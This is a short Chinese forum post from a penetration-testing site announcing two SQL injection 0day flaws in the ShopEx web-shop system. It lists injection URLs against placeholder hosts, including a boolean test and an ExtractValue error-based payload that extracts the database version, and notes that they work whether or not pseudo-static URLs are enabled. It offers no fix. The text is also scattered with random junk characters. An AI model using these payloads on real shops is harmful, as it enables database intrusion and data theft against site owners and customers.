中国网络渗透测试联盟

标题: shopex通杀注入0day漏洞两处 [打印本页]
作者: admin    时间: 2013-2-19 08:31
标题: shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… * s4 v  d7 _2 K& d6 C
/ ^# I- Y& e& {
好吧,我扯远了~~
1 o9 I9 L& C" K其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~8 {/ j: b9 K- |$ r
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: ! s6 i( V$ b: J9 e

" O# T! g- [# x1 t' fhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
; ?* b' ^0 X! o' Y
! q2 W. g. ?4 i) |$ W; qhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
% B( T* W3 X2 M) _* v0 \$ y+ F5 I& T6 c: \- y! T6 Q' J
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 3 d  x( B# a7 Q* j' k
! |. I& H0 i7 [9 b' A8 O/ u
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
" T6 A2 D+ E- U: L% y. i/ J0 c! V

1 I* J, H) t: e一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。* ?# q5 r) `4 @$ W) h( [: C% `
如何注入就不多说了,10多年的东西了…不会也会了… ' q/ \) q) c. e  A
/ N: f) J  A" Q

; {/ B/ l! k- y3 i' T$ C8 q1 ?2 F; z7 d

3 N( G+ `* f- r) \1 d8 @- r3 [



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2